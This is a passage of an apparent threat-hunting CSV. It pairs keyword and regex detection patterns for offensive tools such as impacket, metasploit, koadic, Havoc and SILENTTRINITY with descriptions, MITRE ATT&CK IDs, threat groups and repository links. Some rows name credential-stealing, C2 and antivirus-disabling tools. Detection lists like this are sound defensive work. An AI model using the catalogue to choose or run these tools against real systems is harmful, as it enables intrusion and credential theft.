SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-psexec*",".{0,1000}impacket\-psexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-reg*",".{0,1000}impacket\-reg.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-reg*",".{0,1000}impacket\-reg.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketremcomsvc*",".{0,1000}impacketremcomsvc.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketrpcdatabase*",".{0,1000}impacketrpcdatabase.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-rpcdump*",".{0,1000}impacket\-rpcdump.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","0","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*impacket-rpcdump*",".{0,1000}impacket\-rpcdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-samrdump*",".{0,1000}impacket\-samrdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketsecretsdump*",".{0,1000}impacketsecretsdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-secretsdump*",".{0,1000}impacket\-secretsdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*impacket-secretsdump*",".{0,1000}impacket\-secretsdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketserviceinstall*",".{0,1000}impacketserviceinstall.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-services*",".{0,1000}impacket\-services.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketsmbclient*",".{0,1000}impacketsmbclient.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-smbclient*",".{0,1000}impacket\-smbclient.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-smbserver*",".{0,1000}impacket\-smbserver.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-ticketer*",".{0,1000}impacket\-ticketer.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketutils*",".{0,1000}impacketutils.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-wmiexec*",".{0,1000}impacket\-wmiexec.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Command execution with WMI From Linux","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*impacket-wmiexec*",".{0,1000}impacket\-wmiexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. 
as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ImpactDecoder*",".{0,1000}ImpactDecoder.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ImpactPacket*",".{0,1000}ImpactPacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Impersonate.exe adduser *",".{0,1000}Impersonate\.exe\sadduser\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*Impersonate.exe exec *",".{0,1000}Impersonate\.exe\sexec\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*Impersonate.exe list*",".{0,1000}Impersonate\.exe\slist.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*impersonate_token *Administrator*",".{0,1000}impersonate_token\s.{0,1000}Administrator.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" "*impersonate_token *BUILTIN\Administrators*",".{0,1000}impersonate_token\s.{0,1000}BUILTIN\\Administrators.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ImpersonateAndUnload.cpp*",".{0,1000}ImpersonateAndUnload\.cpp.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*ImpersonateFromParentPid -ppid*",".{0,1000}ImpersonateFromParentPid\s\-ppid.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*ImpersonateLocalService*",".{0,1000}ImpersonateLocalService.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*ImpersonateLoggedOnUser*",".{0,1000}ImpersonateLoggedOnUser.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*impersonate-main.zip*",".{0,1000}impersonate\-main\.zip.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*impersonateprocess.py*",".{0,1000}impersonateprocess\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. 
multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*impersonateuser.boo*",".{0,1000}impersonateuser\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*impersonateuser.py*",".{0,1000}impersonateuser\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. 
multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*Impersonation #1 done.*",".{0,1000}Impersonation\s\#1\sdone\..{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","content","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*Impersonation #1 failed. Exiting*",".{0,1000}Impersonation\s\#1\sfailed\.\sExiting.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","content","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*Impersonation #2 done.*",".{0,1000}Impersonation\s\#2\sdone\..{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","content","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*Impersonation #2 failed. 
Exiting*",".{0,1000}Impersonation\s\#2\sfailed\.\sExiting.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","content","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*imperva_gzip.py*",".{0,1000}imperva_gzip\.py.{0,1000}","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","N/A","2","150","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z" "*Implant*TeamServer.exe*",".{0,1000}Implant.{0,1000}TeamServer\.exe.{0,1000}","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. 
now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","7","82","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" "*Implant.ImplantGenerator*",".{0,1000}Implant\.ImplantGenerator.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*implant.sleep-obf*",".{0,1000}implant\.sleep\-obf.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*implant/elevate/*",".{0,1000}implant\/elevate\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/gather/*",".{0,1000}implant\/gather\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/inject/*",".{0,1000}implant\/inject\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/persist/*",".{0,1000}implant\/persist\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of 